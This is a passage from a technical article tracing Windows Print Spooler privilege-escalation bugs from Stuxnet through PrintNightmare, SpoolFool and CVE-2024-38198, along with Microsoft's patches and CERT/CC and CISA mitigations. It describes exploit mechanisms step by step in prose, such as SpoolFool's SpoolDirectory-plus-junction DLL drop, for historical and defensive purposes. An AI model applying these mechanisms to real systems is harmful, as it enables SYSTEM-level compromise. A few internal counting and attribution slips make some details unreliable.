&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Three of the four Print Spooler design choices -- LocalSystem context, third-party DLL loading, and a low-privilege RPC entry point -- form the architectural primitive. The rest of this article is the story of what happens when the security community discovers, again and again, that any single primitive of that shape produces a SYSTEM-execution bug by construction.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;3. Pre-history: Stuxnet, PrintDemon, and the Bug Class That Already Had a Decade Behind It&lt;/h2&gt;
&lt;p&gt;PrintNightmare is the name the press gave to a 2021 disclosure event. The bug class behind that event is older. The first weaponized Print Spooler privilege-escalation primitive in the public record is from 2010, and it is famous. It was one of the four zero-days Stuxnet chained to reach centrifuge controllers in Natanz.&lt;/p&gt;
&lt;h3&gt;3.1 CVE-2010-2729 (Stuxnet, MS10-061)&lt;/h3&gt;
&lt;p&gt;In September 2010, Microsoft shipped MS10-061 to patch a Print Spooler Service Impersonation Vulnerability that &quot;could allow remote code execution if an attacker sends a specially crafted print request to a vulnerable system that has a print spooler interface exposed over RPC&quot; [@ms-bulletin-ms10-061]. The NVD entry classifies it as a CWE-20 Improper Input Validation in the Print Spooler service that, &quot;when printer sharing is enabled, does not properly validate spooler access permissions&quot; [@nvd-cve-2010-2729]. NVD records publication on September 15, 2010 [@nvd-cve-2010-2729].&lt;/p&gt;

The Symantec dossier on Stuxnet [@symantec-stuxnet-dossier-broadcom] is the canonical technical history of the Iran-Natanz campaign and is out of scope here. What matters for the Print Spooler story is the architectural pattern Stuxnet&apos;s operators noticed. A low-privilege caller could reach a SYSTEM-context RPC service, get the service to do something on the caller&apos;s behalf (write a file, load a DLL, validate a credential), and turn that operation into SYSTEM-context code execution. That pattern is the same one every later PrintNightmare-family bug exploits. The 2010 case is not the first instance of the pattern in Windows. It is the first instance of the pattern in the Windows Print Spooler in the public record.
&lt;h3&gt;3.2 CVE-2020-1048 (PrintDemon, May 2020)&lt;/h3&gt;
&lt;p&gt;Ten years later, in May 2020, two independent research teams published essentially the same Print Spooler bug. Peleg Hadar and Tomer Bar at SafeBreach Labs presented their work at DEF CON Safe Mode 2020 [@defcon-28-hadar-bar-pdf]. Yarden Shafir and Alex Ionescu at Windows Internals wrote it up under the name PrintDemon [@windows-internals-printdemon].The co-discovery pattern is the norm for high-value Windows-internals research. Two well-resourced teams looked at the same architectural primitive and arrived at the same vulnerability within weeks of each other. The May 2020 Microsoft Security Response Center acknowledgments credit both groups. The vulnerability was assigned CVE-2020-1048.&lt;/p&gt;
&lt;p&gt;The mechanism: &lt;code&gt;spoolsv.exe&lt;/code&gt; accepts a Win32 print API call to set a printer port. The port string can be a file path. The spooler, running as LocalSystem, then writes spool data to that file path. A low-privilege user can therefore cause SYSTEM-context arbitrary writes to anywhere on the filesystem. NVD classifies the bug as CWE-669 Incorrect Resource Transfer Between Spheres [@nvd-cve-2020-1048].&lt;/p&gt;
&lt;p&gt;The Shafir-Ionescu writeup is the source of the line that most concisely captures the spooler&apos;s long arc:&lt;/p&gt;

The Print Spooler continues to be one of the oldest Windows components that still has not gotten much scrutiny, even though it is largely unchanged since Windows NT 4, and was even famously abused by Stuxnet. -- Yarden Shafir and Alex Ionescu, May 2020 [@windows-internals-printdemon]
&lt;h3&gt;3.3 CVE-2020-1337 (PrintDemon Redux, August 2020)&lt;/h3&gt;
&lt;p&gt;Microsoft patched CVE-2020-1048 on May 12, 2020. Three months later, on August 11, 2020 Patch Tuesday, Microsoft patched CVE-2020-1337. Paolo Stagno (VoidSec) had demonstrated that the May patch was bypassable through an NTFS junction race [@voidsec-cve-2020-1337]. NVD classes the bypass as a CWE-367 TOCTOU [@nvd-cve-2020-1337].&lt;/p&gt;
&lt;p&gt;The mechanism is the canonical pattern for path-validation patches. Microsoft&apos;s May fix resolved the printer port file path, validated it as benign, then re-resolved it during the actual spool write. Between check and use, a non-administrator could substitute a reparse point that redirected the write to a SYSTEM-writable target. The patch had moved the security check; the architectural primitive (SYSTEM-context filesystem operation on a caller-controlled path) was unchanged.&lt;/p&gt;
&lt;p&gt;The detail to file away: the exact same primitive, NTFS reparse points racing a spooler-side resolve-validate-use sequence, would resurface eighteen months later in SpoolFool. Same primitive, different entry point.&lt;/p&gt;
&lt;h3&gt;3.4 The Pattern Nobody Had Yet Named&lt;/h3&gt;
&lt;p&gt;Three independent research efforts (the Microsoft analysis post-Stuxnet, the SafeBreach and Windows Internals work in 2020, the Sangfor work that would surface in 2021) each rediscovered variants of the same architectural primitive. The frustration the §1 hook left implicit is now nameable. The security community had documented this primitive twice before PrintNightmare became a news event.&lt;/p&gt;
&lt;p&gt;Will Dormann&apos;s CERT/CC advisory VU#383432 (issued June 30, 2021) was not, strictly speaking, about the bug. It was about the disclosure-norms failure that turned an internal bug into an internet-mirrored zero-day inside twenty-four hours. Dormann wrote in plain language:&lt;/p&gt;

CVE-2021-34527 is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in `RpcAddPrinterDriverEx()`. The attack vector is different as well. -- Will Dormann, CERT/CC VU#383432, June 30, 2021 [@cert-vu-383432]
&lt;p&gt;The sentence is unusual for a CERT advisory because it concedes mid-disclosure that the June 8 patch had named one CVE and the public exploits were targeting another. CERT/CC&apos;s explicit &quot;does NOT protect&quot; framing -- which we quote verbatim in section 4.1 at the point in the patch-cascade narrative where it lands hardest -- followed in the same advisory and made the gap unmistakable.&lt;/p&gt;
&lt;p&gt;PrintNightmare is not the name of a CVE. It is the name a panic gave, in the last week of June 2021, to a class of Print Spooler EoP and RCE primitives that had already been exploited in production eleven years earlier and rediscovered by independent researchers fourteen months earlier. The 2021 event made the class famous. It did not invent the class.&lt;/p&gt;
&lt;p&gt;The next section is what happened when Microsoft and the security community spent three years trying to patch the class out of existence one entry point at a time.&lt;/p&gt;
&lt;h2&gt;4. The Patch Cascade: Four Generations of PrintNightmare&lt;/h2&gt;
&lt;p&gt;Between June 8, 2021, and August 13, 2024, Microsoft shipped four named patch waves targeting the PrintNightmare bug class. None of the first three converged. The fourth was issued for an unrelated-looking CVE (CVE-2024-38198) that turned out to be exploitable against a primitive the September 2021 wave had already documented as residual.&lt;/p&gt;
&lt;p&gt;The Mermaid gantt below sets the spine of the timeline. It runs from Stuxnet through the announced third-party-driver end-of-servicing milestones in 2027. Every later subsection of this article maps to a bar in this chart.&lt;/p&gt;

gantt
    title Print Spooler hardening timeline 2010-2027
    dateFormat YYYY-MM-DD
    axisFormat %Y
    section Bugs
    CVE-2010-2729 Stuxnet           :crit, 2010-09-15, 60d
    CVE-2020-1048 PrintDemon        :crit, 2020-05-12, 60d
    CVE-2020-1337 PrintDemon redux  :crit, 2020-08-11, 60d
    CVE-2021-1675                   :crit, 2021-06-08, 30d
    CVE-2021-34527 PrintNightmare   :crit, 2021-07-01, 30d
    CVE-2021-34481                  :crit, 2021-07-15, 30d
    CVE-2021-36958                  :crit, 2021-09-14, 30d
    CVE-2022-21999 SpoolFool        :crit, 2022-02-08, 30d
    CVE-2024-38198                  :crit, 2024-08-13, 30d
    section Patches
    MS10-061                        :active, 2010-09-14, 30d
    KB5004945 emergency             :active, 2021-07-06, 30d
    KB5005010 default flip          :active, 2021-08-10, 30d
    KB5005652 policy rewrite        :active, 2021-09-14, 30d
    SpoolFool fix                   :active, 2022-02-08, 30d
    Redirection Guard               :active, 2023-12-01, 60d
    section Architecture
    WPP announced                   :done, 2023-12-13, 30d
    WPP ships opt-in 24H2           :done, 2024-10-01, 30d
    No new 3p drivers WU            :2026-01-15, 30d
    IPP class preferred             :2026-07-01, 30d
    3p driver servicing ends        :2027-07-01, 30d
&lt;h3&gt;4.1 Generation 1: The June 8 Patch and the Sangfor Disclosure Failure&lt;/h3&gt;
&lt;p&gt;On June 8, 2021 Patch Tuesday, Microsoft fixed CVE-2021-1675, a Windows Print Spooler Elevation of Privilege Vulnerability rated CVSS v3.1 7.8 local EoP [@nvd-cve-2021-1675]. The fix added an authorization check to &lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt; (MS-RPRN section 3.1.4.4.8) so that a low-privilege user could no longer install an arbitrary printer driver into the spooler process via that synchronous entry point [@ms-rprn-rpcaddprinterdriverex]. Microsoft credited Zhipeng Huo (Tencent Security Xuanwu Lab), Piotr Madej (AFINE), and Yunhai Zhang (NSFOCUS Security Team), as recorded in the Wayback snapshot of the Sangfor README [@afwu-wayback-snapshot]. Three reporters. No Victor Mata. Mata enters this story later, in section 4.3.&lt;/p&gt;
&lt;p&gt;On June 21, 2021, Microsoft silently reclassified CVE-2021-1675 from EoP to RCE [@nvd-cve-2021-1675]. BleepingComputer&apos;s June 30 article documents the reclassification and the subsequent confusion it caused [@bleepingcomputer-domain-takeover]. The Sangfor team had been working from the June 8 advisory&apos;s EoP framing; by the time they noticed the reclassification, their PoC was already mirrored across the internet.&lt;/p&gt;
&lt;p&gt;The chaos compressed into seventy-two hours. June 29: Sangfor pushes &lt;code&gt;afwu/PrintNightmare&lt;/code&gt;, then deletes the repository on realizing the RCE was unpatched. June 30: public mirrors propagate across multiple GitHub accounts; CERT/CC publishes VU#383432 [@cert-vu-383432]; Sergiu Gatlan files the BleepingComputer &quot;domain takeover&quot; story [@bleepingcomputer-domain-takeover]. July 1: Microsoft assigns CVE-2021-34527 as a separate-bulletin entity covering the unpatched RCE primitive [@nvd-cve-2021-34527] [@msrc-cve-2021-34527]. CERT/CC documents the CVE pair as &quot;similar but distinct&quot; with the qualifier that &quot;the attack vector is different as well&quot; [@cert-vu-383432]. They are not the same bug; the new CVE is not simply the &quot;remote&quot; version of the old one.&lt;/p&gt;

This update does NOT protect against public exploits that may refer to PrintNightmare or CVE-2021-1675. -- Will Dormann, CERT/CC VU#383432 [@cert-vu-383432]
&lt;p&gt;CERT/CC&apos;s only available mitigation, in the window between July 1 and the emergency patch, was to stop and disable the Spooler service entirely [@cert-vu-383432]. The runnable block below models the PowerShell logic in JavaScript (the blog runtime supports JS, not PowerShell). The semantics are the same: turn the service off, verify it stays off across reboot.&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;// Original PowerShell from CERT/CC VU#383432: //   Stop-Service -Name Spooler -Force //   Set-Service -Name Spooler -StartupType Disabled //   Get-Service -Name Spooler // // The probe below models the resulting state machine so you can // see what &quot;safe&quot; looks like for a domain controller under CISA // Emergency Directive 21-04. const spoolerState = {   status: &apos;Stopped&apos;,   startupType: &apos;Disabled&apos; }; const isCertSafe = spoolerState.status === &apos;Stopped&apos;   &amp;amp;&amp;amp; spoolerState.startupType === &apos;Disabled&apos;; console.log(isCertSafe   ? &apos;OK: spooler stopped and disabled (CERT/CC mitigation in force)&apos;   : &apos;WARN: spooler running or set to auto-start (vulnerable surface present)&apos;);&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;On July 6 and July 7, 2021, Microsoft shipped KB5004945 out-of-band. The NVD entry for CVE-2021-34527 records both shipping dates verbatim: &quot;UPDATE July 7, 2021: The security update for Windows Server 2012, Windows Server 2016 and Windows 10, Version 1607 have been released&quot; [@nvd-cve-2021-34527]. KB5004945&apos;s summary line is unambiguous: &quot;Updates a remote code execution exploit in the Windows Print Spooler service, known as PrintNightmare, as documented in CVE-2021-34527&quot; [@kb-5004945-help].KB5004945&apos;s SKU fan-out was unusually wide. Microsoft shipped the patch for Windows 10 across multiple feature updates, for Windows 11 (just-released at the time), for Windows Server 2016/2019/2022, and for ESU-only SKUs back through Windows 7 SP1 and Windows Server 2008 R2 [@kb-5004945-help]. The fan-out signals how broadly the vulnerable surface had spread across the supported install base, which is most of the reason the press could describe the bug as fleet-wide.&lt;/p&gt;
&lt;p&gt;The patch had two parts. The first closed the immediate RCE. The second added a new Group Policy registry value: &lt;code&gt;RestrictDriverInstallationToAdministrators&lt;/code&gt;. KB5004945 shipped this value as OFF by default. KB5005010 (released August 10, 2021) records the timeline of the default flip verbatim: &quot;Updates released July 6, 2021 or later have a default of 0 (disabled) until updates released August 10, 2021. Updates released August 10, 2021 or later have a default of 1 (enabled)&quot; [@kb-5005010-topic].&lt;/p&gt;
&lt;p&gt;The patch had a switch. The switch was off by default. The press named the bug PrintNightmare. By the end of the first week, the patch had not, in practice, been applied to most of the installed base.&lt;/p&gt;
&lt;h3&gt;4.2 Generation 2: &lt;code&gt;@cube0x0&lt;/code&gt;, MS-PAR, and the Asynchronous-Variant Patch Bypass&lt;/h3&gt;
&lt;p&gt;After KB5004945 closed the synchronous &lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt; entry point on MS-RPRN, a researcher under the handle &lt;code&gt;@cube0x0&lt;/code&gt; updated his repository to target the symmetric asynchronous entry point in MS-PAR. Different protocol family. Same primitive. No patch.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;RpcAsyncAddPrinterDriver&lt;/code&gt; (MS-PAR section 3.1.4.1, Opnum 39) is, in Microsoft&apos;s own words, &quot;The counterpart of this method in the Print System Remote Protocol&quot; [@ms-par-rpcasyncaddprinterdriver]. CERT/CC&apos;s updated VU#383432 names the bypass explicitly:&lt;/p&gt;

While original exploit code relied on the `RpcAddPrinterDriverEx` to achieve code execution, an updated version of the exploit uses `RpcAsyncAddPrinterDriver` to achieve the same goal. -- Will Dormann, CERT/CC VU#383432 update [@cert-vu-383432]
&lt;p&gt;The &lt;code&gt;@cube0x0&lt;/code&gt; GitHub repository carries the artifact of the rename-mid-disclosure chaos in its very name. The repository is called &lt;code&gt;cube0x0/CVE-2021-1675&lt;/code&gt;. The vulnerability it actually exploits is CVE-2021-34527. The README&apos;s first paragraph clarifies: &quot;Impacket implementation of the PrintNightmare PoC originally created by Zhiniang Peng (@edwardzpeng) and Xuefeng Li (@lxf02942370). Tested on a fully patched 2019 Domain Controller&quot; [@cube0x0-cve-2021-1675].The repository-name-versus-CVE mismatch is a small artifact of the disclosure chaos, but it caused real downstream confusion. Detection rule authors had to handle both names. SigmaHQ&apos;s Zeek-on-the-wire rule for the wire-level driver-install primitive lists both &lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt; and &lt;code&gt;RpcAsyncAddPrinterDriver&lt;/code&gt; precisely because the entry point split between the two CVEs [@sigma-cve-2021-1675-zeek].&lt;/p&gt;
&lt;p&gt;The July 6 emergency patch (KB5004945) added the access check to MS-PAR&apos;s &lt;code&gt;RpcAsyncAddPrinterDriver&lt;/code&gt; in addition to MS-RPRN&apos;s &lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt;. Microsoft&apos;s NVD entry for CVE-2021-34527 records the residual configuration risk verbatim:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &quot;Having &lt;code&gt;NoWarningNoElevationOnInstall&lt;/code&gt; set to 1 makes your system vulnerable by design.&quot; -- Microsoft, NVD entry for CVE-2021-34527 [@nvd-cve-2021-34527]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;CISA&apos;s response was Emergency Directive 21-04, issued July 13, 2021. The directive mandated that federal civilian agencies disable the Print Spooler service on all Microsoft Active Directory domain controllers by 11:59 PM EDT on Wednesday, July 14, 2021 [@cisa-ed-21-04]. The framing in CISA&apos;s own words was direct: &quot;exploitation of the vulnerability allows an attacker to remotely execute code with system level privileges enabling a threat actor to quickly compromise the entire identity infrastructure of a targeted organization&quot; [@cisa-ed-21-04].&lt;/p&gt;

ED 21-04 is narrower than the press summaries suggest. It applies only to Active Directory domain controllers. It does not require disabling Spooler on every Windows endpoint in a federal agency, only on the hosts where the bug&apos;s domain-takeover impact is largest. CISA closed ED 21-04 in January 2026 and folded its required actions into BOD 22-01 (the Known Exploited Vulnerabilities catalogue), but the operational guidance survived intact: disable Spooler on DCs, patch elsewhere. The DC-disabled baseline is still the federal civilian default for agencies that have not migrated to Universal Print [@cisa-ed-21-04]. We come back to this in section 10.4.
&lt;p&gt;The June 8 patch covered one RPC entry point. The July 6 patch covered the other. Neither patch changed the architectural primitive. Within five weeks, a third primitive (not an RPC entry point but a registry default) was already failing.&lt;/p&gt;
&lt;h3&gt;4.3 Generation 3: CVE-2021-34481, KB5005010, KB5005652, and the September Policy Rewrite&lt;/h3&gt;
&lt;p&gt;On August 10, 2021, Microsoft shipped the cumulative update that flipped the &lt;code&gt;RestrictDriverInstallationToAdministrators&lt;/code&gt; default from 0 to 1. On September 14, 2021, it shipped the knowledge-base article that documented why the previous defaults could not be saved.&lt;/p&gt;
&lt;p&gt;CVE-2021-34481 had already been published as a Print Spooler local EoP on July 15, 2021, classified by NVD as CWE-269 Improper Privilege Management [@nvd-cve-2021-34481]. The August 10 KB5005010 / KB5005033 cumulative updates closed it and flipped the default value for the &lt;code&gt;HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint\RestrictDriverInstallationToAdministrators&lt;/code&gt; registry value from 0 to 1 [@kb-5005010-topic]. NVD&apos;s entry for CVE-2021-34481 carries the cross-reference verbatim: &quot;UPDATE August 10, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability... This security update changes the Point and Print default behavior; please see KB5005652&quot; [@nvd-cve-2021-34481].&lt;/p&gt;
&lt;p&gt;The five-week opt-in window between July 6 and August 10, 2021, is the most interesting failure in the entire patch cascade. Hosts that received KB5004945 but had no Group Policy push for the new value were still exploitable through Point and Print elevation suppression even with the emergency patch applied. The lesson is structural. Opt-in safe defaults do not protect a real installed base.&lt;/p&gt;
&lt;p&gt;On September 14, 2021, KB5005652 shipped. The article&apos;s title spells out its scope: &quot;Manage new Point and Print default driver installation behavior (CVE-2021-34481)&quot; [@kb-5005652-topic]. The article&apos;s most-quoted sentence is the most consequential one Microsoft has shipped about Print Spooler:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; KB5005652 says, in a customer-facing knowledge-base article, that there is no settings-tweak combination that gives you the same protection as flipping the new admin-only switch. That is Microsoft, in its own voice, naming the configuration surface as insufficient.&lt;/p&gt;
&lt;/blockquote&gt;

There is no combination of mitigations that is equivalent to setting `RestrictDriverInstallationToAdministrators` to 1. -- Microsoft, KB5005652, September 14, 2021 [@kb-5005652-topic] [@kb-5005652-help]
&lt;p&gt;Read that sentence twice. Microsoft, in its own knowledge-base voice, said that no combination of the previously available configuration knobs added up to the protection the new admin-only restriction provided. The implication is that for the entire period from Windows NT 4 through August 10, 2021 (roughly twenty-three years), the configuration surface for Point and Print did not contain a setting that made the bug class go away. Tightening individual knobs got you somewhere short of the architectural answer. That is the verbatim concession the September article makes.&lt;/p&gt;
&lt;p&gt;The same Patch Tuesday (September 14, 2021), Microsoft also patched CVE-2021-36958, another Print Spooler RCE in the same family [@nvd-cve-2021-36958].The reporter attribution for CVE-2021-36958 remains disputed in the public record. Public consensus credits Victor Mata (Accenture Security FusionX) for the formal MSRC acknowledgment. Benjamin Delpy demonstrated public bypasses of the existing PrintNightmare mitigations through August 2021 that are most often cited as the immediate motivation for the September fix. We have not located a Microsoft-primary source that resolves the question, and we cite both names rather than collapse them.&lt;/p&gt;
&lt;p&gt;Three patch waves into PrintNightmare, Microsoft had written down, in a customer-facing knowledge-base article, that no configuration-surface response was equivalent to the architectural fix. The architectural fix did not yet exist. SpoolFool was four months away.&lt;/p&gt;
&lt;h3&gt;4.4 Generation 4: CVE-2022-21999 (SpoolFool, February 8, 2022)&lt;/h3&gt;
&lt;p&gt;On February 8, 2022, Oliver Lyak (handle &lt;code&gt;@ly4k_&lt;/code&gt;, trailing underscore) of SafeBreach Labs published SpoolFool. The exploit is a Print Spooler local privilege escalation that abuses the &lt;code&gt;SpoolDirectory&lt;/code&gt; registry value plus an NTFS junction [@ly4k-spoolfool]. The primitive was the same one Shafir and Ionescu had described eighteen months earlier in CVE-2020-1337. The patch surface had moved. The architectural primitive had not.&lt;/p&gt;
&lt;p&gt;The mechanism, walked through carefully: each per-printer registry key under &lt;code&gt;HKLM\System\CurrentControlSet\Control\Print\Printers\&amp;lt;printer-name&amp;gt;&lt;/code&gt; has a &lt;code&gt;SpoolDirectory&lt;/code&gt; value. The SYSTEM-context spooler reads that value, calls &lt;code&gt;CreateDirectory&lt;/code&gt; on the path, and then writes spool files into the resulting directory. The &lt;code&gt;SpoolDirectory&lt;/code&gt; value is writable by an authenticated user. The exploit therefore composes three steps: (1) set &lt;code&gt;SpoolDirectory&lt;/code&gt; to an attacker-chosen path, (2) plant an NTFS junction or symbolic link at that path pointing into a SYSTEM-writable directory, (3) trigger a printer reload to cause the SYSTEM-context spooler to create the destination directory and drop attacker-controlled files there [@ly4k-spoolfool]. NVD classifies the bug as CWE-59 Link Following [@nvd-cve-2022-21999].&lt;/p&gt;
&lt;p&gt;Anti-regression note for readers familiar with the early coverage: SpoolFool is a Print Spooler arbitrary-file-write LPE. It is not a Win32k integrity-level bypass. Win32k is the GUI subsystem and is uninvolved in this bug class. The researcher handle is &lt;code&gt;@ly4k_&lt;/code&gt; (Oliver Lyak), not &lt;code&gt;@jonas_lyk&lt;/code&gt; (a distinct security researcher).&lt;/p&gt;
&lt;p&gt;From arbitrary file write to SYSTEM code execution is the next step. Lyak&apos;s repository demonstrates a DLL-drop into a path that a SYSTEM-context process will load on next start, then a service restart, then SYSTEM-context execution of the attacker&apos;s DLL [@ly4k-spoolfool]. The end-to-end primitive is the same shape as the post-PrintDemon exploit chain from August 2020.&lt;/p&gt;
&lt;p&gt;The architectural moral: patching &lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt;, patching &lt;code&gt;RpcAsyncAddPrinterDriver&lt;/code&gt;, and flipping the Point and Print elevation default did not change the fact that the spooler runs as SYSTEM and operates on user-controlled filesystem paths. SpoolFool is the bug-fixing-bug exhibit for the section 5 architectural-concession argument. Four patches into the cycle, the same TOCTOU primitive that the August 2020 PrintDemon bypass had used was still exploitable eighteen months later, against a different callsite, against the same SYSTEM-context spooler.&lt;/p&gt;
&lt;h3&gt;4.5 Generation 5: CVE-2024-38198 (August 13, 2024 Patch Tuesday)&lt;/h3&gt;
&lt;p&gt;On August 13, 2024 Patch Tuesday, Microsoft patched a Windows Print Spooler Elevation of Privilege Vulnerability. The CVSS v3.1 base score was 7.5, with vector &lt;code&gt;AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H&lt;/code&gt; [@wiz-cve-2024-38198] [@rapid7-cve-2024-38198]. The CWE class was 345, Insufficient Verification of Data Authenticity [@wiz-cve-2024-38198]. The exploit primitive required winning a race condition. No public researcher attribution exists for it. There is, as of mid-2026, no public PoC.&lt;/p&gt;
&lt;p&gt;The framing here has to be precise. CWE-345 is &quot;Insufficient Verification of Data Authenticity&quot;; CWE-362 is &quot;Race Condition.&quot; These are two different classes. The exploit happens to require winning a race condition to be exploitable; that is a statement about how hard it is to exploit, not a statement about the underlying bug class. Microsoft (per Wiz, citing the MSRC advisory) classified the underlying defect as CWE-345.The CWE-345 attribution for CVE-2024-38198 is INFERRED via Wiz&apos;s vulnerability database, which states verbatim that &quot;the vulnerability has been classified under CWE-345 (Insufficient Verification of Data Authenticity) by Microsoft Corporation&quot; [@wiz-cve-2024-38198]. The MSRC update-guide page is a JavaScript single-page application, so verification of the CWE attribution by automated tools like &lt;code&gt;web_fetch&lt;/code&gt; runs through Wiz&apos;s vulnerability database as the one-step intermediary; a reader with a browser can confirm the same classification directly on the MSRC page. Rapid7&apos;s vulnerability database carries the per-SKU KB list and confirms the August 13, 2024 publication date [@rapid7-cve-2024-38198].&lt;/p&gt;
&lt;p&gt;Why this CVE matters for the section 5 argument: it is the empirical proof point that the spooler was still producing novel-class EoP primitives three years after PrintNightmare, eight months after Microsoft announced WPP in the December 2023 MORSE blog [@ms-blog-secure-print-experience-4002645], and seven weeks before WPP shipped opt-in.&lt;/p&gt;
&lt;p&gt;Four patch waves across three years. Five named CVEs in the patch tree, plus four more in the pre-history. Nine independently classed Print Spooler SYSTEM-code-execution primitives in fifteen years. The next section is about why Microsoft did not, and could not, ship a tenth patch that closed the class.&lt;/p&gt;
&lt;h3&gt;4.6 The Four-Generation Patch Tree, in One Diagram&lt;/h3&gt;
&lt;p&gt;The patch tree, mapped to the entry point each generation closed and the bypass each generation enabled:&lt;/p&gt;

flowchart TD
    G1[&quot;G1: June 8, 2021&lt;br /&gt;RpcAddPrinterDriverEx&lt;br /&gt;auth check added&quot;]
    G2[&quot;G2: July 6, 2021&lt;br /&gt;KB5004945 emergency&lt;br /&gt;RpcAsyncAddPrinterDriver patched&quot;]
    G3[&quot;G3: August 10, 2021&lt;br /&gt;KB5005010 / KB5005033&lt;br /&gt;RestrictDriverInstallationToAdmins default 0 to 1&quot;]
    G3b[&quot;G3b: September 14, 2021&lt;br /&gt;KB5005652&lt;br /&gt;no settings combination is equivalent&quot;]
    G4[&quot;G4: February 8, 2022&lt;br /&gt;CVE-2022-21999 SpoolFool&lt;br /&gt;SpoolDirectory + NTFS junction CWE-59&quot;]
    G5[&quot;G5: August 13, 2024&lt;br /&gt;CVE-2024-38198&lt;br /&gt;CWE-345 race-condition-exploitable&quot;]
    G1 --&amp;gt; G2
    G2 --&amp;gt; G3
    G3 --&amp;gt; G3b
    G3b --&amp;gt; G4
    G4 --&amp;gt; G5
    G5 --&amp;gt; EXIT[&quot;Architectural exit:&lt;br /&gt;WPP / Universal Print&lt;br /&gt;(section 5)&quot;]
&lt;p&gt;And the four-fix-strategy comparison matrix in scannable form:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;CVE&lt;/th&gt;
&lt;th&gt;Patch artifact&lt;/th&gt;
&lt;th&gt;Attack surface closed&lt;/th&gt;
&lt;th&gt;Attack surface left open&lt;/th&gt;
&lt;th&gt;Time to documented bypass&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;G1&lt;/td&gt;
&lt;td&gt;CVE-2021-1675&lt;/td&gt;
&lt;td&gt;June 8 monthly patch&lt;/td&gt;
&lt;td&gt;&lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt; (MS-RPRN) low-priv path&lt;/td&gt;
&lt;td&gt;&lt;code&gt;RpcAsyncAddPrinterDriver&lt;/code&gt; (MS-PAR) low-priv path&lt;/td&gt;
&lt;td&gt;~3 weeks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G2&lt;/td&gt;
&lt;td&gt;CVE-2021-34527&lt;/td&gt;
&lt;td&gt;KB5004945 (July 6-7 OOB)&lt;/td&gt;
&lt;td&gt;Both RPC entry points&lt;/td&gt;
&lt;td&gt;Point-and-Print elevation suppression (&lt;code&gt;NoWarningNoElevationOnInstall=1&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;~5 weeks (config-not-yet-flipped)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G3&lt;/td&gt;
&lt;td&gt;CVE-2021-34481&lt;/td&gt;
&lt;td&gt;KB5005010 / KB5005033 / KB5005652&lt;/td&gt;
&lt;td&gt;Admin-only default for new printer driver install&lt;/td&gt;
&lt;td&gt;Spool directory filesystem operations&lt;/td&gt;
&lt;td&gt;~21 weeks (SpoolFool)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G4&lt;/td&gt;
&lt;td&gt;CVE-2022-21999&lt;/td&gt;
&lt;td&gt;February 2022 patch&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SpoolDirectory&lt;/code&gt; reparse-point race&lt;/td&gt;
&lt;td&gt;Other spooler filesystem operations and authenticity checks&lt;/td&gt;
&lt;td&gt;~30 months (CVE-2024-38198)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G5&lt;/td&gt;
&lt;td&gt;CVE-2024-38198&lt;/td&gt;
&lt;td&gt;August 13, 2024 patch&lt;/td&gt;
&lt;td&gt;CWE-345 authenticity gap (race-condition exploitable)&lt;/td&gt;
&lt;td&gt;Architectural primitive itself&lt;/td&gt;
&lt;td&gt;(no public bypass as of June 2026)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Five subsections. Five entry points. One architectural primitive. The patches do not converge because they cannot.&lt;/p&gt;
&lt;h2&gt;5. The Architectural Concession: Why Microsoft Cannot Sandbox &lt;code&gt;spoolsv.exe&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;An obvious question reading section 4 is: why does Microsoft not just sandbox &lt;code&gt;spoolsv.exe&lt;/code&gt;? AppContainer exists. Win32 has had constrained-token processes since Windows 8. The Microsoft Office suite runs in low-trust containers. Why is the Print Spooler the exception?&lt;/p&gt;
&lt;h3&gt;5.1 The Naive Sandbox Proposal&lt;/h3&gt;
&lt;p&gt;The naive proposal is to run &lt;code&gt;spoolsv.exe&lt;/code&gt; in an AppContainer with no SYSTEM token. The proposal fails for two reasons. The first is engineering. The spooler must register with the Service Control Manager, must coordinate with kernel-mode print components, and must accept inbound RPC over a system named pipe -- operations a fully constrained token does not permit. That problem is solvable; it costs engineering effort, but it has obvious answers (broker process, careful capability grants, custom token).&lt;/p&gt;

A Windows process sandboxing primitive introduced for the Universal Windows Platform that runs a process with a custom integrity level, a restricted token, and a set of explicitly granted capabilities. AppContainer-restricted processes cannot make network connections, read user files, or invoke APIs outside their capability set without explicit permission. Microsoft Edge content processes and many Windows Store apps run in AppContainers; legacy Win32 services typically do not.
